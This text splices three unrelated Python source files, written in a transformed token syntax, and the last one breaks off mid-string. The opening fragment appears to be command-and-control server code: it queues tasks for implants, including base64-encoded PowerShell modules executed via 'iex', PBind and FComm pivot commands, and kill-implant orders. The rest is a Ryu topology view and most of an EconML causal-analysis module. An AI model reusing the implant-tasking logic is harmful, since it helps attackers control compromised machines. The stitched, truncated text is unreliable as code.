os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"loadmodule%s\""%modulestr<block_end><elif_stmt>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"loadmodule%s\""%modulestr<block_end><else_stmt><block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module(module_name)<line_sep>command="run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\""%base64.b64encode(bytes(modulestr "utf-8")).decode('utf-8')<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-command ")<block_start><try_stmt><block_start>cmd=command.replace("pbind-command " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%base64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-connect")<block_start>command=command.replace("pbind-connect " "run-exe PBind PBind start 
")<block_end><elif_stmt>task[2].startswith("pbind-kill")<block_start>command=command.replace("pbind-kill" "run-exe PBind PBind kill-implant")<block_end><elif_stmt>task[2].startswith("fcomm-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("fcomm-loadmodule " "")<if_stmt>".exe"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"loadmodule%s\""%modulestr<block_end><elif_stmt>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"loadmodule%s\""%modulestr<block_end><else_stmt><block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\""%base64.b64encode(bytes(modulestr "utf-8")).decode('utf-8')<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-command ")<block_start>command=command.replace("fcomm-command " "run-exe FComm.FCClass FComm ")<block_end><elif_stmt>task[2].startswith("fcomm-connect")<block_start>command=command.replace("fcomm-connect " "run-exe FComm.FCClass FComm start ")<block_end><elif_stmt>task[2].startswith("fcomm-kill")<block_start>command=command.replace("fcomm-kill" "run-exe FComm.FCClass FComm kill-implant")<block_end><elif_stmt>task[2].startswith("pbind-pivot-command ")<block_start><try_stmt><block_start>cmd=command.replace("pbind-pivot-command " "")<line_sep>base64string1=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>base64string=base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%base64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-connect")<block_start>command=command.replace("pbind-pivot-connect " "run-exe PBind PBind run-exe PBind PBind start ")<block_end><elif_stmt>task[2].startswith("pbind-pivot-kill")<block_start>command=command.replace("pbind-pivot-kill" "run-exe PBind PBind run-exe PBind PBind kill-implant")<block_end># Uncomment to print actual commands that are being sent # if "AAAAAAAAAAAAAAAAAAAA" not in command: # print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN) command=taskIdStr+command<if_stmt>commands<block_start>commands<augadd>"!d-3dion@LD!-d"+command<block_end><else_stmt><block_start>commands<augadd>command<block_end>DB.del_newtasks(str(task[0]))<block_end><if_stmt>commands<is><not><none><block_start>multicmd="multicmd%s"%commands<block_end><try_stmt><block_start>responseVal=encrypt(EncKey multicmd)<block_end><except_stmt>Exception<as>e<block_start>responseVal=""<line_sep>print("Error encrypting value: 
%s"%e)<block_end>now=datetime.datetime.now()<line_sep>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep><return>responseVal<block_end><elif_stmt>RandomURI<in>path<and><not>tasks# if there is no tasks but its a normal beacon send 200 <block_start>now=datetime.datetime.now()<line_sep>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep><return>default_response()<block_end><block_end><block_end><block_end>
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>flask render_template request<import_stmt>view_base<class_stmt>IndexView(view_base.ViewBase)<block_start><def_stmt>__init__ self<block_start>super(IndexView self).__init__()<block_end><def_stmt>run self<block_start>host,port=request.host.split(':')<line_sep><return>render_template('topology.html' host=host port=port)<block_end><block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """Module for assessing causal feature importance."""<import_stmt>warnings<import_from_stmt>collections OrderedDict namedtuple<import_stmt>joblib<import_stmt>lightgbm<as>lgb<import_from_stmt>numba.core.utils erase_traceback<import_stmt>numpy<as>np<import_from_stmt>numpy.lib.function_base iterable<import_stmt>pandas<as>pd<import_from_stmt>sklearn.base BaseEstimator TransformerMixin<import_from_stmt>sklearn.compose ColumnTransformer<import_from_stmt>sklearn.ensemble GradientBoostingClassifier RandomForestClassifier RandomForestRegressor<import_from_stmt>sklearn.linear_model Lasso LassoCV LogisticRegression LogisticRegressionCV<import_from_stmt>sklearn.pipeline make_pipeline Pipeline<import_from_stmt>sklearn.preprocessing OneHotEncoder PolynomialFeatures StandardScaler<import_from_stmt>sklearn.tree _tree<import_from_stmt>sklearn.utils.validation column_or_1d<import_from_stmt>...cate_interpreter SingleTreeCateInterpreter SingleTreePolicyInterpreter<import_from_stmt>...dml LinearDML CausalForestDML<import_from_stmt>...inference NormalInferenceResults<import_from_stmt>...sklearn_extensions.linear_model WeightedLasso<import_from_stmt>...sklearn_extensions.model_selection GridSearchCVList<import_from_stmt>...utilities _RegressionWrapper inverse_onehot<line_sep># TODO: this utility is documented but internal; reimplement? <import_from_stmt>sklearn.utils _safe_indexing<line_sep># TODO: this utility is even less public... <import_from_stmt>sklearn.utils _get_column_indices<class_stmt>_CausalInsightsConstants<block_start>RawFeatureNameKey='raw_name'<line_sep>EngineeredNameKey='name'<line_sep>CategoricalColumnKey='cat'<line_sep>TypeKey='type'<line_sep>PointEstimateKey='point'<line_sep>StandardErrorKey='stderr'<line_sep>ZStatKey='zstat'<line_sep>ConfidenceIntervalLowerKey='ci_lower'<line_sep>ConfidenceIntervalUpperKey='ci_upper'<line_sep>PValueKey='p_value'<line_sep>Version='version'<line_sep>CausalComputationTypeKey='causal_computation_type'<line_sep>ConfoundingIntervalKey='confounding_interval'<line_sep>ViewKey='view'<line_sep>InitArgsKey='init_args'<line_sep>RowData='row_data'# NOTE: RowData is mutually exclusive with the other data columns ALL=[RawFeatureNameKey EngineeredNameKey CategoricalColumnKey TypeKey PointEstimateKey StandardErrorKey ZStatKey ConfidenceIntervalLowerKey ConfidenceIntervalUpperKey PValueKey Version CausalComputationTypeKey ConfoundingIntervalKey ViewKey InitArgsKey RowData]<block_end><def_stmt>_get_default_shared_insights_output <block_start>""" Dictionary elements shared among all analyses. In case of breaking changes to this dictionary output, the major version of this dictionary should be updated. In case of a change to this dictionary, the minor version should be updated. 
"""<line_sep><return>{_CausalInsightsConstants.RawFeatureNameKey:[] _CausalInsightsConstants.EngineeredNameKey:[] _CausalInsightsConstants.CategoricalColumnKey:[] _CausalInsightsConstants.TypeKey:[] _CausalInsightsConstants.Version:'1.0' _CausalInsightsConstants.CausalComputationTypeKey:"simple" _CausalInsightsConstants.ConfoundingIntervalKey:<none> _CausalInsightsConstants.InitArgsKey:{}}<block_end><def_stmt>_get_default_specific_insights view# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged <block_start><return>{_CausalInsightsConstants.PointEstimateKey:[] _CausalInsightsConstants.StandardErrorKey:[] _CausalInsightsConstants.ZStatKey:[] _CausalInsightsConstants.ConfidenceIntervalLowerKey:[] _CausalInsightsConstants.ConfidenceIntervalUpperKey:[] _CausalInsightsConstants.PValueKey:[] _CausalInsightsConstants.ViewKey:view}<block_end><def_stmt>_get_metadata_causal_insights_keys <block_start><return>[_CausalInsightsConstants.Version _CausalInsightsConstants.CausalComputationTypeKey _CausalInsightsConstants.ConfoundingIntervalKey _CausalInsightsConstants.ViewKey]<block_end><def_stmt>_get_column_causal_insights_keys <block_start><return>[_CausalInsightsConstants.RawFeatureNameKey _CausalInsightsConstants.EngineeredNameKey _CausalInsightsConstants.CategoricalColumnKey _CausalInsightsConstants.TypeKey]<block_end><def_stmt>_get_data_causal_insights_keys <block_start><return>[_CausalInsightsConstants.PointEstimateKey _CausalInsightsConstants.StandardErrorKey _CausalInsightsConstants.ZStatKey _CausalInsightsConstants.ConfidenceIntervalLowerKey _CausalInsightsConstants.ConfidenceIntervalUpperKey _CausalInsightsConstants.PValueKey]<block_end><def_stmt>_first_stage_reg X y * automl=<true> random_state=<none> verbose=0<block_start><if_stmt>automl<block_start>model=GridSearchCVList([LassoCV(random_state=random_state) RandomForestRegressor(n_estimators=100 random_state=random_state min_samples_leaf=10) lgb.LGBMRegressor(num_leaves=32 random_state=random_state)] param_grid_list=[{} {'min_weight_fraction_leaf':[.001 .01 .1]} {'learning_rate':[0.1 0.3] 'max_depth':[3 5]}] cv=3 scoring='r2' verbose=verbose)<line_sep>best_est=model.fit(X y).best_estimator_<if_stmt>isinstance(best_est LassoCV)<block_start><return>Lasso(alpha=best_est.alpha_ random_state=random_state)<block_end><else_stmt><block_start><return>best_est<block_end><block_end><else_stmt><block_start>model=LassoCV(cv=5 random_state=random_state).fit(X y)<line_sep><return>Lasso(alpha=model.alpha_ random_state=random_state)<block_end><block_end><def_stmt>_first_stage_clf X y * make_regressor=<false> automl=<true> min_count=<none> random_state=<none> verbose=0# use same Cs as would be used by default by LogisticRegressionCV <block_start>cs=np.logspace(-4 4 10)<if_stmt>min_count<is><none><block_start>min_count=_CAT_LIMIT# we have at least this many instances <block_end><if_stmt>automl# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification # which could affect how many times each distinct Y value needs to be present in the data <block_start>model=GridSearchCVList([LogisticRegression(max_iter=1000 random_state=random_state) RandomForestClassifier(n_estimators=100 min_samples_leaf=10 random_state=random_state) lgb.LGBMClassifier(num_leaves=32 random_state=random_state)] param_grid_list=[{'C':cs} {'max_depth':[3 <none>] 'min_weight_fraction_leaf':[.001 .01 .1]} {'learning_rate':[0.1 0.3] 'max_depth':[3 5]}] cv=min(3 min_count) scoring='neg_log_loss' 
verbose=verbose)<line_sep>est=model.fit(X y).best_estimator_<block_end><else_stmt><block_start>model=LogisticRegressionCV(cv=min(5 min_count) max_iter=1000 Cs=cs random_state=random_state).fit(X y)<line_sep>est=LogisticRegression(C=model.C_[0] max_iter=1000 random_state=random_state)<block_end><if_stmt>make_regressor<block_start><return>_RegressionWrapper(est)<block_end><else_stmt><block_start><return>est<block_end><block_end><def_stmt>_final_stage * random_state=<none> verbose=0<block_start><return>GridSearchCVList([WeightedLasso(random_state=random_state) RandomForestRegressor(n_estimators=100 random_state=random_state verbose=verbose)] param_grid_list=[{'alpha':[.001 .01 .1 1 10]} {'max_depth':[3 5] 'min_samples_leaf':[10 50]}] cv=3 scoring='neg_mean_squared_error' verbose=verbose)<block_end># simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns # but also supports get_feature_names with expected signature <class_stmt>_ColumnTransformer(TransformerMixin)<block_start><def_stmt>__init__ self categorical passthrough<block_start>self.categorical=categorical<line_sep>self.passthrough=passthrough<block_end><def_stmt>fit self X<block_start>cat_cols=_safe_indexing(X self.categorical axis=1)<if_stmt>cat_cols.shape[1]<g>0<block_start>self.has_cats=<true><line_sep># NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value self.one_hot_encoder=OneHotEncoder(sparse=<false> handle_unknown='ignore').fit(cat_cols)<block_end><else_stmt><block_start>self.has_cats=<false><block_end>self.d_x=X.shape[1]<line_sep><return>self<block_end><def_stmt>transform self X<block_start>rest=_safe_indexing(X self.passthrough axis=1)<if_stmt>self.has_cats<block_start>cats=self.one_hot_encoder.transform(_safe_indexing(X self.categorical axis=1))<line_sep># NOTE: we rely on the passthrough columns coming first in the concatenated X;W # when we pipeline scaling with our first stage models later, so the order here is important <return>np.hstack((rest cats))<block_end><else_stmt><block_start><return>rest<block_end><block_end><def_stmt>get_feature_names self names=<none><block_start><if_stmt>names<is><none><block_start>names=[f"x{i}"<for>i range(self.d_x)]<block_end>rest=_safe_indexing(names self.passthrough axis=0)<if_stmt>self.has_cats<block_start>cats=self.one_hot_encoder.get_feature_names(_safe_indexing(names self.categorical axis=0))<line_sep><return>np.concatenate((rest cats))<block_end><else_stmt><block_start><return>rest<block_end><block_end><block_end># Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy <class_stmt>_Wrapper<block_start><def_stmt>__init__ self item<block_start>self.item=item<block_end><block_end><class_stmt>_FrozenTransformer(TransformerMixin BaseEstimator)<block_start><def_stmt>__init__ self wrapper<block_start>self.wrapper=wrapper<block_end><def_stmt>fit self X y<block_start><return>self<block_end><def_stmt>transform self X<block_start><return>self.wrapper.item.transform(X)<block_end><block_end><def_stmt>_freeze transformer<block_start><return>_FrozenTransformer(_Wrapper(transformer))<block_end># Convert python objects to (possibly nested) types that can easily be represented as literals <def_stmt>_sanitize obj<block_start><if_stmt>obj<is><none><or>isinstance(obj (bool int str float))<block_start><return>obj<block_end><elif_stmt>isinstance(obj dict)<block_start><return>{_sanitize(key):_sanitize(obj[key])<for>key 
obj}<block_end><else_stmt><block_start><try_stmt><block_start><return>[_sanitize(item)<for>item obj]<block_end><except_stmt>Exception<block_start><raise>ValueError(f"Could not sanitize input {obj}")<block_end><block_end><block_end># Convert SingleTreeInterpreter to a python dictionary <def_stmt>_tree_interpreter_to_dict interp features leaf_data=<lambda>t n:{}<block_start>tree=interp.tree_model_.tree_<line_sep>node_dict=interp.node_dict_<def_stmt>recurse node_id<block_start><if_stmt>tree.children_left[node_id]<eq>_tree.TREE_LEAF<block_start><return>{'leaf':<true> 'n_samples':tree.n_node_samples[node_id] **leaf_data(tree node_id node_dict)}<block_end><else_stmt><block_start><return>{'leaf':<false> 'feature':features[tree.feature[node_id]] 'threshold':tree.threshold[node_id] 'left':recurse(tree.children_left[node_id]) 'right':recurse(tree.children_right[node_id])}<block_end><block_end><return>recurse(0)<block_end><class_stmt>_PolicyOutput<block_start>""" A type encapsulating various information related to a learned policy. Attributes ---------- tree_dictionary:dict The policy tree represented as a dictionary, policy_value:float The average value of applying the recommended policy (over using the control), always_treat:dict of string to float A dictionary mapping each non-control treatment to the value of always treating with it (over control), control_name:string The name of the control treatment """<def_stmt>__init__ self tree_dictionary policy_value always_treat control_name<block_start>self.tree_dictionary=tree_dictionary<line_sep>self.policy_value=policy_value<line_sep>self.always_treat=always_treat<line_sep>self.control_name=control_name<block_end><block_end># named tuple type for storing results inside CausalAnalysis class; # must be lifted to module level to enable pickling _result=namedtuple("_result" field_names=["feature_index" "feature_name" "feature_baseline" "feature_levels" "hinds" "X_transformer" "W_transformer" "estimator" "global_inference" "treatment_value"])<def_stmt>_process_feature name feat_ind verbose categorical_inds categories heterogeneity_inds min_counts y X nuisance_models h_model random_state model_y cv mc_iters<block_start><try_stmt><block_start><if_stmt>verbose<g>0<block_start>print(f"CausalAnalysis: Feature {name}")<block_end>discrete_treatment=feat_ind<in>categorical_inds<if_stmt>discrete_treatment<block_start>cats=categories[categorical_inds.index(feat_ind)]<block_end><else_stmt><block_start>cats='auto'<block_end># just leave the setting at the default otherwise # the transformation logic here is somewhat tricky; we always need to encode the categorical columns, # whether they end up in X or in W. However, for the continuous columns, we want to scale them all # when running the first stage models, but don't want to scale the X columns when running the final model, # since then our coefficients will have odd units and our trees will also have decisions using those units. 
# # we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting) hinds=heterogeneity_inds[feat_ind]<line_sep>WX_transformer=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) [ind<for>ind categorical_inds<if>ind<ne>feat_ind]) ('drop' 'drop' feat_ind)] remainder=StandardScaler())<line_sep>W_transformer=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) [ind<for>ind categorical_inds<if>ind<ne>feat_ind<and>ind<not><in>hinds]) ('drop' 'drop' hinds) ('drop_feat' 'drop' feat_ind)] remainder=StandardScaler())<line_sep>X_cont_inds=[ind<for>ind hinds<if>ind<ne>feat_ind<and>ind<not><in>categorical_inds]<line_sep># Use _ColumnTransformer instead of ColumnTransformer so we can get feature names X_transformer=_ColumnTransformer([ind<for>ind categorical_inds<if>ind<ne>feat_ind<and>ind<in>hinds] X_cont_inds)<line_sep># Controls are all other columns of X WX=WX_transformer.fit_transform(X)<line_sep># can't use X[:, feat_ind] when X is a DataFrame T=_safe_indexing(X feat_ind axis=1)<line_sep># TODO: we can't currently handle unseen values of the feature column when getting the effect; # we might want to modify OrthoLearner (and other discrete treatment classes) # so that the user can opt-in to allowing unseen treatment values # (and return NaN or something in that case) W=W_transformer.fit_transform(X)<line_sep>X_xf=X_transformer.fit_transform(X)<line_sep># HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models # and so we can just peel the first columns off of that combined array for rescaling in the pipeline # TODO: consider addding an API to DML that allows for better understanding of how the nuisance inputs are # built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this # becomes a valid approach to handling this X_scaler=ColumnTransformer([('scale' StandardScaler() list(range(len(X_cont_inds))))] remainder='passthrough').fit(np.hstack([X_xf W])).named_transformers_['scale']<line_sep>X_scaler_fixed=ColumnTransformer([('scale' _freeze(X_scaler) list(range(len(X_cont_inds))))] remainder='passthrough')<if_stmt>W.shape[1]<eq>0# array checking routines don't accept 0-width arrays <block_start>W=<none><block_end><if_stmt>X_xf.shape[1]<eq>0<block_start>X_xf=<none><block_end><if_stmt>verbose<g>0<block_start>print("CausalAnalysis: performing model selection on T model")<block_end># perform model selection model_t=(_first_stage_clf(WX T automl=nuisance_models<eq>'automl' min_count=min_counts.get(feat_ind <none>) random_state=random_state verbose=verbose)<if>discrete_treatment<else>_first_stage_reg(WX T automl=nuisance_models<eq>'automl' random_state=random_state verbose=verbose))<line_sep>pipelined_model_t=Pipeline([('scale' X_scaler_fixed) ('model' model_t)])<line_sep>pipelined_model_y=Pipeline([('scale' X_scaler_fixed) ('model' model_y)])<if_stmt>X_xf<is><none><and>h_model<eq>'forest'<block_start>warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "<concat>"because forests don't support models with no heterogeneity indices")<line_sep>h_model='linear'<block_end><if_stmt>h_model<eq>'linear'<block_start>est=LinearDML(model_y=pipelined_model_y model_t=pipelined_model_t discrete_treatment=discrete_treatment fit_cate_intercept=<true> linear_first_stages=<false> categories=cats random_state=random_state cv=cv 
mc_iters=mc_iters)<block_end><elif_stmt>h_model<eq>'forest'<block_start>est=CausalForestDML(model_y=pipelined_model_y model_t=pipelined_model_t discrete_treatment=discrete_treatment n_estimators=4000 min_var_leaf_on_val=<true> categories=cats random_state=random_state verbose=verbose cv=cv mc_iters=mc_iters)<if_stmt>verbose<g>0<block_start>print("CausalAnalysis: tuning forest")<block_end>est.tune(y T X=X_xf W=W)<block_end><if_stmt>verbose<g>0<block_start>print("CausalAnalysis: training causal model")<block_end>est.fit(y T X=X_xf W=W cache_values=<true>)<line_sep># Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative <if_stmt>h_model<eq>'forest'<and>discrete_treatment<block_start>global_inference=est.ate__inference()<block_end><else_stmt># convert to NormalInferenceResults for consistency <block_start>inf=est.const_marginal_ate_inference(X=X_xf)<line_sep>global_inference=NormalInferenceResults(d_t=inf.d_t d_y=inf.d_y pred=inf.mean_point pred_stderr=inf.stderr_mean mean_pred_stderr=<none> inf_type='ate')<block_end># Set the dictionary values shared between local and global summaries <if_stmt>discrete_treatment<block_start>cats=est.transformer.categories_[0]<line_sep>baseline=cats[est.transformer.drop_idx_[0]]<line_sep>cats=cats[np.setdiff1d(np.arange(len(cats)) est.transformer.drop_idx_[0])]<line_sep>d_t=len(cats)<line_sep>insights={_CausalInsightsConstants.TypeKey:['cat']<times>d_t _CausalInsightsConstants.RawFeatureNameKey:[name]<times>d_t _CausalInsightsConstants.CategoricalColumnKey:cats.tolist() _CausalInsightsConstants.EngineeredNameKey:[f"{name} (base={baseline}): {c}"<for>c cats]}<line_sep>treatment_value=1<block_end><else_stmt><block_start>d_t=1<line_sep>cats=["num"]<line_sep>baseline=<none><line_sep>insights={_CausalInsightsConstants.TypeKey:["num"] _CausalInsightsConstants.RawFeatureNameKey:[name] _CausalInsightsConstants.CategoricalColumnKey:[name] _CausalInsightsConstants.EngineeredNameKey:[name]}<line_sep># calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments treatment_value=np.mean(np.abs(T[T<ne>0]))<block_end>result=_result(feature_index=feat_ind feature_name=name feature_baseline=baseline feature_levels=cats hinds=hinds X_transformer=X_transformer W_transformer=W_transformer estimator=est global_inference=global_inference treatment_value=treatment_value)<line_sep><return>insights result<block_end><except_stmt>Exception<as>e<block_start><return>e<block_end><block_end># Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category # required to fit a discrete DML model _CAT_LIMIT=10<class_stmt>CausalAnalysis<block_start>""" Note: this class is experimental and the API may evolve over our next few releases. Gets causal importance of features. Parameters ---------- feature_inds: array-like of int, str, or bool The features for which to estimate causal effects, expressed as either column indices, column names, or boolean flags indicating which columns to pick categorical: array-like of int, str, or bool The features which are categorical in nature, expressed as either column indices, column names, or boolean flags indicating which columns to pick heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None If a 1d array, then whenever estimating a heterogeneous (local) treatment effect model, then only the features in this array will be used for heterogeneity. 
If a 2d array then its first dimension should be len(feature_inds) and whenever estimating a local causal effect for target feature feature_inds[i], then only features in heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_ind=None then all features are used for heterogeneity for all features, and if heterogeneity_inds=[] then no features will be. feature_names: list of str, default None The names for all of the features in the data. Not necessary if the input will be a dataframe. If None and the input is a plain numpy array, generated feature names will be ['X1', 'X2', ...]. upper_bound_on_cat_expansion: int, default 5 The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a feature has more than this many values, then a causal effect model is not fitted for that target feature and a warning flag is raised. The remainder of the models are fitted. classification: bool, default False Whether this is a classification (as opposed to regression) task TODO. Enable also multi-class classification (post-MVP) nuisance_models: one of {'linear', 'automl'}, optional (default='linear') What models to use for nuisance estimation (i.e. for estimating propensity models or models of how controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV (for classification) are used. If 'automl', then a kfold cross-validation and model selection is performed among several models and the best is chosen. TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases of models or also integrate with azure autoML. (post-MVP) heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear') What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead. TODO. Add other options, such as {'automl'} for performing model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP) categories: 'auto' or list of ('auto' or list of values), default 'auto' What categories to use for the categorical columns. If 'auto', then the categories will be inferred for all categorical columns; otherwise this argument should have as many entries as there are categorical columns, and each entry should be either 'auto' to infer the values for that column or the list of values for the column. If explicit values are provided, the first value is treated as the "control" value for that column against which other values are compared. n_jobs: int, default -1 Degree of parallelism to use when training models via joblib.Parallel verbose : int, default=0 Controls the verbosity when fitting and predicting. cv: int, cross-validation generator or an iterable, default 5 Determines the strategy for cross-fitting used when training causal models for each feature. Possible inputs for cv are: - integer, to specify the number of folds. - :term:`CV splitter` - An iterable yielding (train, test) splits as arrays of indices. 
For integer inputs, if the treatment is discrete :class:`~sklearn.model_selection.StratifiedKFold` is used, else, :class:`~sklearn.model_selection.KFold` is used (with a random shuffle in either case). mc_iters: int, default 3 The number of times to rerun the first stage models to reduce the variance of the causal model nuisances. skip_cat_limit_checks: bool, default False By default, categorical features need to have several instances of each category in order for a model to be fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case). random_state : int, RandomState instance or None, default=None Controls the randomness of the estimator. The features are always randomly permuted at each split. When ``max_features < n_features``, the algorithm will select ``max_features`` at random at each split before finding the best split among them. But the best found split may vary across different runs, even if ``max_features=n_features``. That is the case, if the improvement of the criterion is identical for several splits and one split has to be selected at random. To obtain a deterministic behaviour during fitting, ``random_state`` has to be fixed to an integer. Attributes ---------- nuisance_models_: string The nuisance models setting used for the most recent call to fit heterogeneity_model: string The heterogeneity model setting used for the most recent call to fit feature_names_: list of string The list of feature names from the data in the most recent call to fit trained_feature_indices_: list of int The list of feature indices where models were trained successfully untrained_feature_indices_: list of tuple of (int, string or Exception) The list of indices that were requested but not able to be trained succesfully, along with either a reason or caught Exception for each """<def_stmt>__init__ self feature_inds categorical heterogeneity_inds=<none> feature_names=<none> classification=<false> upper_bound_on_cat_expansion=5 nuisance_models='linear' heterogeneity_model='linear' * categories='auto' n_jobs=-1 verbose=0 cv=5 mc_iters=3 skip_cat_limit_checks=<false> random_state=<none><block_start>self.feature_inds=feature_inds<line_sep>self.categorical=categorical<line_sep>self.heterogeneity_inds=heterogeneity_inds<line_sep>self.feature_names=feature_names<line_sep>self.classification=classification<line_sep>self.upper_bound_on_cat_expansion=upper_bound_on_cat_expansion<line_sep>self.nuisance_models=nuisance_models<line_sep>self.heterogeneity_model=heterogeneity_model<line_sep>self.categories=categories<line_sep>self.n_jobs=n_jobs<line_sep>self.verbose=verbose<line_sep>self.cv=cv<line_sep>self.mc_iters=mc_iters<line_sep>self.skip_cat_limit_checks=skip_cat_limit_checks<line_sep>self.random_state=random_state<block_end><def_stmt>fit self X y warm_start=<false><block_start>""" Fits global and local causal effect models for each feature in feature_inds on the data Parameters ---------- X : array-like Feature data y : array-like of shape (n,) or (n,1) Outcome. If classification=True, then y should take two values. Otherwise an error is raised that only binary classification is implemented for now. TODO. enable multi-class classification for y (post-MVP) warm_start : boolean, default False If False, train models for each feature in `feature_inds`. 
If True, train only models for features in `feature_inds` that had not already been trained by the previous call to `fit`, and for which neither the corresponding heterogeneity_inds, nor the automl flag have changed. If heterogeneity_inds have changed, then the final stage model of these features will be refit. If the automl flag has changed, then whole model is refit, despite the warm start flag. """<line_sep># Validate inputs <assert_stmt>self.nuisance_models<in>['automl' 'linear'] ("The only supported nuisance models are 'linear' and 'automl', "<concat>f"but was given {self.nuisance_models}")<assert_stmt>self.heterogeneity_model<in>['linear' 'forest'] ("The only supported heterogeneity models are 'linear' and 'forest' but received "<concat>f"{self.heterogeneity_model}")<assert_stmt>np.ndim(X)<eq>2 f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"<assert_stmt>iterable(self.feature_inds) f"feature_inds should be array-like, but got {self.feature_inds}"<assert_stmt>iterable(self.categorical) f"categorical should be array-like, but got {self.categorical}"<assert_stmt>self.heterogeneity_inds<is><none><or>iterable(self.heterogeneity_inds) (f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")<assert_stmt>self.feature_names<is><none><or>iterable(self.feature_names) (f"feature_names should be None or array-like, but got {self.feature_names}")<assert_stmt>self.categories<eq>'auto'<or>iterable(self.categories) (f"categories should be 'auto' or array-like, but got {self.categories}")<line_sep># TODO: check compatibility of X and Y lengths <if_stmt>warm_start<block_start><if_stmt><not>hasattr(self "_results")# no previous fit, cancel warm start <block_start>warm_start=<false><block_end><elif_stmt>self._d_x<ne>X.shape[1]<block_start><raise>ValueError(f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")<block_end><block_end># work with numeric feature indices, so that we can easily compare with categorical ones train_inds=_get_column_indices(X self.feature_inds)<if_stmt>len(train_inds)<eq>0<block_start><raise>ValueError("No features specified. 
